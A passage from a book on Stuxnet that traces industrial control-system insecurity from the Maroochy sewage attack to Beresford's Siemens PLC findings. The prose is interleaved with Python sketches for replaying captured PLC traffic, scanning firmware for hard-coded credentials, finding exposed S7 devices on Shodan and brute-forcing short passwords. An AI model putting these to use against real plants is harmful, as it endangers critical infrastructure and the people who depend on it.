Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon

by Kim Zetter


  The attacks continued on and off for weeks and reached a peak one night in March when more than two dozen incidents occurred. Investigators finally concluded it must be a rogue insider sending malicious commands in the field via two-way radio signals.14 They zeroed in on a former contractor named Vitek Boden, a forty-nine-year-old engineer who had worked for Hunter WaterTech until his contract expired in December, around the time the first water pump failed. Boden had subsequently sought a full-time job with the water district but was turned down in January—which is when the bulk of the problems began.

  Sure enough, when police caught up with Boden one night in April after alarm systems at four pump stations were disabled, they found a laptop in his car with Hunter WaterTech’s proprietary software installed and a two-way radio set to the nonpublic frequency the water district used to communicate with pumping stations. They also found an RTU Boden had apparently used to send out the bogus commands.15

  Boden’s case was the first cyberattack against a critical infrastructure system to come to light, but it likely wasn’t the first to occur. Others no doubt had simply gone undetected or unreported.16 In the wake of the Maroochy incident, workers from other utilities told investigators that they would never have pursued criminal charges against Boden as Maroochy had done, in order to keep the matter quiet.17

  The case should have been a wake-up call to control-system operators around the world, but many dismissed it because it involved an inside attacker who had extensive knowledge of the Maroochy Shire system and access to the specialized equipment needed to conduct the attack. No outsider could have done what Boden did, they argued, ignoring a number of security problems with Maroochy’s control-system network that outsiders could have exploited to carry out similar attacks. Peter Kingsley, one of the investigators on the case, later warned attendees at a control-system conference that although the Maroochy hack had been an inside job, breaches from outsiders were by no means impossible. “Some utilities believe they’re protected because they themselves can’t find an unauthorized way to access their systems,” he said. “But hackers don’t restrict themselves to ordinary techniques.”18

  Kingsley’s warning gained little traction in 2002, however, because there were still few signs that outsiders were interested in hacking critical infrastructure systems. And in the absence of any major disaster, the security of control systems simply wasn’t a concern.

  It was around this time that Joe Weiss became an evangelist for control-system security.

  Weiss is a lean and energetic sixty-four-year-old who works out of his home in Cupertino, California, the heart of Silicon Valley, and is used to thinking about catastrophic scenarios. He lives just five miles from California’s notorious San Andreas Fault and the seventy-year-old Stevens Creek Dam. When the Loma Prieta earthquake struck the area in 1989, chimneys toppled, streetlights and phones died for several days, and shockwaves in the swimming pool at nearby DeAnza College ejected polo players from the water and onto the pavement like beached seals.

  Weiss first became aware of the security problems with control systems in 1999. A nuclear engineer by training, he was working for the Electric Power Research Institute when the Y2K issue arose. Armageddon warnings in the press predicted dystopian meltdowns when computer clocks struck midnight on New Year’s Eve, because a widespread programming shortcut that stored years as just two digits left software unable to handle the rollover to the year 2000. Weiss began to wonder: if such a minor thing as a change of date could threaten to bring control systems to a halt, what would more serious issues do? More important, if Y2K could accidentally cause huge problems, what might an intentional attack from hackers do?

  Dozens of security conferences held around the world each year focused on general computer security, but none of them addressed control systems. So Weiss began attending them to learn what security guidelines the control-system community should adopt. But the more conferences he attended, the more worried he got. When network administrators talked about using encryption and authentication to prevent unauthorized users from accessing their systems, Weiss realized that control systems had none of the standard protections that normal computer networks used. When security experts asked him what brand of firewall control-system operators at energy plants used or how often they reviewed their network logs for evidence of intruders, Weiss had to reply, “We don’t have firewalls. No network logs, either.”19 And when he began to ask control-system makers about the security of their products, he got blank stares in response. They told him no one had ever asked about security before.

  Then two planes struck the Twin Towers in September 2001, and not long afterward, authorities uncovered suspicious patterns of searches on government websites in California. The searchers appeared to be exploring digital systems used to manage utilities and government offices in the San Francisco region. The activity, which appeared to originate from IP addresses in Saudi Arabia, Indonesia, and Pakistan, showed a particular interest in emergency phone systems, power and water plants, and gas facilities.20 Other searches focused on programming controls for fire-dispatch systems and pipelines.

  The following year, US forces in Kabul seized a computer in an al-Qaeda office and found models of a dam on it along with engineering software that could be used to simulate its failure.21 That same year, the CIA issued a Directorate of Intelligence Memorandum stating that al-Qaeda had “far more interest” in cyberterrorism than previously believed and had begun to contemplate hiring hackers.

  There were signs that others might be interested in US critical infrastructure too.22 In 2001, hackers broke into servers at the California Independent System Operator, or Cal-ISO, a nonprofit corporation that manages the transmission system for moving electricity throughout most of the state. The attackers got in through two unprotected servers and remained undetected for two weeks until workers noticed problems with their machines.23 Cal-ISO officials insisted the breach posed no threat to the grid, but unnamed sources told the Los Angeles Times that the hackers were caught just as they were trying to access “key parts of the system” that would have allowed them to cause serious disruptions in electrical service. One person called it a near “catastrophic breach.” The attack appeared to originate from China, and came in the midst of a tense political standoff between China and the United States after a US spy plane collided in midair with a Chinese fighter jet over the South China Sea.

  In response to growing concerns about critical infrastructure, and in particular the security of the nation’s power grids, the Department of Energy launched a National SCADA Test Bed program in 2003 at the Idaho National Lab (INL). The goal was to work with the makers of control systems to evaluate their equipment for security vulnerabilities, an initiative that ultimately led to the 2007 Aurora Generator Test.24

  There are 2,800 power plants in the United States and 300,000 sites producing oil and natural gas.25 Another 170,000 facilities make up the nation’s public water system, which includes reservoirs, dams, wells, treatment facilities, pumping stations, and pipelines.26 But 85 percent of these and other critical infrastructure facilities are in the hands of the private sector, which means that aside from a few government-regulated industries—such as the nuclear power industry—the government can do little to force companies to secure their systems. The government, however, could at least try to convince the makers of control systems to improve the security of their products. Under the test-bed program, the government would conduct the tests as long as the vendors agreed to fix any vulnerabilities the tests uncovered.27

  Around the same time, DHS also launched a site-assessment program through its Industrial Control System Cyber Emergency Response Team (ICS-CERT) to evaluate the security configuration of critical infrastructure equipment and networks already installed at facilities. Between 2002 and 2009, the team conducted more than 100 site assessments across multiple industries—oil and natural gas, chemical, and water—and found more than 38,000 vulnerabilities. These included critical systems that were accessible over the internet, default vendor passwords that operators had never bothered to change or hard-coded passwords that couldn’t be changed, outdated software patches, and a lack of standard protections such as firewalls and intrusion-detection systems.

  But despite the best efforts of the test-bed and site-assessment researchers, they were battling decades of industry inertia—vendors took months and years to patch vulnerabilities that government researchers found in their systems, and owners of critical infrastructure were only willing to make cosmetic changes to their systems and networks, resisting more extensive ones.

  Weiss, who worked as a liaison with INL to help develop its test-bed program, got fed up with the inertia and launched a conference to educate critical-infrastructure operators about the dangerous security problems with their systems. In 2004, he resorted to scare tactics by demonstrating a remote attack to show them what could be done. The role of hacker was played by Jason Larsen, a researcher at INL, who demonstrated an attack against a substation in Idaho Falls from a computer at Sandia National Laboratory in New Mexico. Exploiting a recently discovered vulnerability in server software, Larsen bypassed several layers of firewalls to hack a PLC controlling the substation and release his payload in several stages. The first stage opened and closed a breaker. The second stage opened all of the breakers at once. The third stage opened all of the breakers but manipulated data sent to operator screens to make it appear that the breakers were closed.

  “I call it my ‘wet pants’ demo,” Weiss says. “It was a phenomenal success.”

  Weiss followed the demo a few years later with another one and then another, each time enlisting different security experts to demonstrate different modes of attack. The only problem was, they were ahead of their time. Each time engineers would leave his conference fired up with ideas about improving the security of their networks, they would run up against executives back home who balked at the cost of re-architecting and securing the systems. Why spend money on security, they argued, when none of their competitors were doing it and no one was attacking them?

  But what Weiss and the test lab couldn’t achieve in a decade, Stuxnet achieved in a matter of months. The digital weapon shone a public spotlight on serious vulnerabilities in the nation’s industrial control systems for the first time, and critical equipment that for so long had remained obscure and unknown to most of the world now caught the attention of researchers and hackers, forcing vendors and critical-infrastructure owners to finally take note as well.

  THE NEWS IN August 2010 that Stuxnet was sabotaging Siemens PLCs caught the interest of a twenty-five-year-old computer security researcher in Austin, Texas, named Dillon Beresford. Beresford, like most people, had never heard of PLCs and was curious to see how vulnerable they might be. So he bought several Siemens PLCs online and spent two months examining and testing them in the bedroom of his small apartment. It took just a few weeks to uncover multiple vulnerabilities that he could use in an attack.

  He discovered, for example, that none of the communication that passed between a programmer’s machine and the PLCs was encrypted, so any hacker who broke into the network could see and copy commands as they were transmitted to the PLCs, then later play them back to a PLC to control and stop it at will. This would not have been possible had the PLCs rejected commands sent from unauthorized computers, but Beresford found that the PLCs were promiscuous computers that would talk to any machine that spoke their protocol language. They also didn’t require that commands sent to them be digitally signed with a certificate to prove that they came from a trustworthy source.

  Although there was an authentication packet, or password of sorts, that passed between a Step 7 machine and the PLC, Beresford was able to decode the password in less than three hours. He also found that he could simply capture the authentication packet as it passed from a Step 7 machine to the PLC and replay it in the same way he replayed commands, eliminating the need to decode the password at all. Once he had control of a PLC, he could also issue a command to change the password to lock out legitimate users.28
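  To make the replay idea concrete, the following is a minimal, purely illustrative Python sketch of what capturing and resending unauthenticated PLC traffic looks like. The capture file, frame delimiter, and PLC address are hypothetical stand-ins; port 102 is the ISO-TSAP port that Siemens S7 PLCs listen on, and a real session would also involve protocol-specific handshaking that is omitted here.

```python
# Purely illustrative sketch: replaying previously captured, unauthenticated
# traffic to a PLC. The capture file, frame delimiter, and address below are
# hypothetical; a real S7 session also requires COTP/ISO-TSAP setup frames,
# which a full capture would include.
import socket

PLC_ADDR = ("192.0.2.10", 102)          # hypothetical PLC; 102 is the ISO-TSAP port
CAPTURE_FILE = "captured_session.bin"   # hypothetical dump of sniffed Step 7-to-PLC frames
DELIMITER = b"\n--FRAME--\n"            # hypothetical delimiter used when the dump was saved

def replay_capture():
    # Load the raw frames of a session recorded earlier on the same network.
    with open(CAPTURE_FILE, "rb") as f:
        frames = [fr for fr in f.read().split(DELIMITER) if fr]

    with socket.create_connection(PLC_ADDR, timeout=5) as s:
        for frame in frames:
            s.sendall(frame)        # resend the sniffed bytes verbatim
            reply = s.recv(4096)    # the PLC answers as if the real Step 7 machine had sent them
            print(f"sent {len(frame)} bytes, received {len(reply)} bytes")

if __name__ == "__main__":
    replay_capture()
```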

  Beresford found other vulnerabilities as well, including a back door that Siemens programmers had left in the firmware of their PLCs—firmware is the basic software that is resident on hardware devices to make them work. Vendors often place global, hard-coded passwords in their systems to access them remotely to provide troubleshooting for customers—like an OnStar feature for control systems. But backdoors that allow vendors to slip in also let attackers in.29 The username and password for opening the Siemens back door were the same for every system—“basisk”—and were hard-coded into the firmware, where anyone who examined it could find them. Using this back door, an attacker could delete files from the PLC, reprogram it, or issue commands to sabotage whatever operations the PLC controlled.30
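  Spotting a credential like “basisk” in firmware requires no special tooling; scanning an extracted image for runs of printable characters is usually enough. The sketch below, with a hypothetical filename, shows the general technique rather than the specific procedure Beresford used.

```python
# Minimal sketch: scanning an extracted firmware image for runs of printable
# ASCII, the way a researcher might spot a hard-coded credential such as
# "basisk". The filename is a hypothetical placeholder.
import re
import sys

def printable_strings(path, min_len=6):
    with open(path, "rb") as f:
        data = f.read()
    # Yield (offset, text) for every run of printable ASCII at least min_len bytes long.
    for match in re.finditer(rb"[ -~]{%d,}" % min_len, data):
        yield match.start(), match.group().decode("ascii")

if __name__ == "__main__":
    firmware = sys.argv[1] if len(sys.argv) > 1 else "plc_firmware.bin"
    for offset, text in printable_strings(firmware):
        # Flag anything that looks like it might be a credential or login prompt.
        if any(hint in text.lower() for hint in ("pass", "user", "login", "basisk")):
            print(f"0x{offset:08x}  {text}")
```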

  Beresford reported his findings to ICS-CERT, which worked with Siemens to get the vulnerabilities fixed. But not all of them could be. Some, like the transmission of unencrypted commands and the lack of strong authentication, were fundamental design issues, not programming bugs, which required Siemens to upgrade the firmware on its systems to fix them or, in some cases, re-architect them. And these weren’t just problems for Siemens PLCs; they were fundamental design issues that many control systems had, a legacy of their pre-internet days, when the devices were built for isolated networks and didn’t need to withstand attacks from outsiders.

  Beresford’s findings defied longstanding assertions by vendors and critical-infrastructure owners that their systems were secure because only someone with extensive knowledge of PLCs and experience working with the systems could attack them. With $20,000 worth of used equipment purchased online and two months working in his spare time, Beresford had found more than a dozen vulnerabilities and learned enough about the systems to compromise them.

  Since Beresford’s findings, other researchers have uncovered additional vulnerabilities in Siemens and other control systems. According to a database of control-system vulnerabilities managed by Wurldtech Security, a maker of systems for protecting critical infrastructure, about 1,000 vulnerabilities have been found in control systems and control-system protocols since 2008. Most of them would simply allow an attacker to prevent operators from monitoring their system, but many of them would also allow an attacker to hijack the system.31

  In 2011, a security firm hired by a Southern California utility to evaluate the security of controllers at its substations found multiple vulnerabilities that would allow an attacker to control its equipment. “We’ve never looked at a device like this before, and we were able to find this in the first day,” Kurt Stammberger, vice president of Mocana, said. “These were big, major problems, and problems frankly that have been known about for at least a year and a half, but the utility had no clue.”32

  The security problems with control systems are exacerbated by the fact that the systems don’t get replaced for years and don’t get patched on a regular basis the way general computers do. The life-span of a standard desktop PC is three to five years, after which companies upgrade to new models. But the life-span of a control system can be two decades. And even when a system is replaced, new models have to communicate with legacy systems, so they often contain many of the same vulnerabilities as the old ones.

  As for patching, some control systems run on outdated versions of Windows that are no longer supported by Microsoft, meaning that if any new vulnerabilities are discovered in the software, they will never get patched by the vendor. But even when patches are available, patching is done infrequently on control systems because operators are wary of buggy patches that might crash their systems and because they can’t easily take critical systems—and the processes they control—out of service for the several hours it can take to install patches or do other security maintenance.33

  All of these problems are compounded by a growing trend among vendors to package safety systems with their control systems. Safety systems used to be hardwired analog systems configured separately from control systems so that any problems with the control system wouldn’t interfere with the safety system’s ability to shut down equipment in an emergency. But many vendors are now building the safety system into their control system, making it easier to disable them both in a single attack.34

  Many of the vulnerabilities in control systems could be mitigated if the systems ran on standalone networks that were “air-gapped”—that is, never connected to the internet or connected to other systems that are connected to the internet. But this isn’t always the case.

  In 2012, a researcher in the UK found more than 10,000 control systems that were connected to the internet—including ones belonging to water-treatment and power plants, dams, bridges, and train stations—using Shodan, a specialized search engine that can locate internet-connected devices like VoIP phones, smart TVs, and control systems.35
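  As an illustration, a query like the one below uses Shodan’s official Python library to list hosts exposing a given port. The API key is a placeholder, and searching on port 102, the ISO-TSAP port Siemens S7 PLCs listen on, is just one example of the kind of query that surfaces internet-facing industrial devices.

```python
# Illustrative sketch using the official "shodan" Python library
# (pip install shodan). The API key is a placeholder, and the query is just
# one example: port 102 is the ISO-TSAP port Siemens S7 PLCs listen on.
import shodan

API_KEY = "YOUR_SHODAN_API_KEY"   # placeholder

def list_exposed_hosts(query="port:102"):
    api = shodan.Shodan(API_KEY)
    results = api.search(query)
    print(f"Hosts matching {query!r}: {results['total']}")
    for match in results["matches"][:10]:
        country = match.get("location", {}).get("country_name", "unknown")
        print(match["ip_str"], match.get("org", "unknown"), country)

if __name__ == "__main__":
    list_exposed_hosts()
```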

  In 2011 a hacker named pr0f accessed the controls for a water plant in South Houston after finding the city’s Siemens control system online. Although the system was password-protected, it used a three-character password that was easily guessed. “I’m sorry this ain’t a tale of advanced persistent threats and stuff,” pr0f told a reporter at the time, “but frankly most compromises I’ve seen have been a result of gross stupidity, not incredible technical skill on the part of the attacker.”36 Once in the SCADA system, pr0f took screenshots showing the layout of water tanks and digital controls, though he didn’t sabotage the system. “I don’t really like mindless vandalism. It’s stupid and silly,” he wrote in a post he published online. “On the other hand, so is connecting interfaces to your SCADA machinery to the internet.”37
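  The arithmetic behind pr0f’s point is stark: even over a generous alphabet of lowercase letters and digits, a three-character password allows only 36³, or 46,656, combinations, a space a script can walk through in seconds. The sketch below makes the point with a hypothetical try_login stand-in; it is not a depiction of the actual South Houston system.

```python
# Back-of-the-envelope sketch of why a three-character password is no barrier:
# the entire space over lowercase letters and digits is 36**3 = 46,656 guesses.
# try_login is a hypothetical stand-in for whatever login interface is exposed.
import itertools
import string

ALPHABET = string.ascii_lowercase + string.digits   # 36 characters

def candidate_passwords(length=3):
    for combo in itertools.product(ALPHABET, repeat=length):
        yield "".join(combo)

def try_login(password):
    # Hypothetical check; a real attacker would submit each guess to the
    # exposed interface. Here the "secret" is an arbitrary example value.
    return password == "3ab"

if __name__ == "__main__":
    for attempts, pw in enumerate(candidate_passwords(), start=1):
        if try_login(pw):
            print(f"found {pw!r} after {attempts} of {len(ALPHABET) ** 3} possible guesses")
            break
```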

 
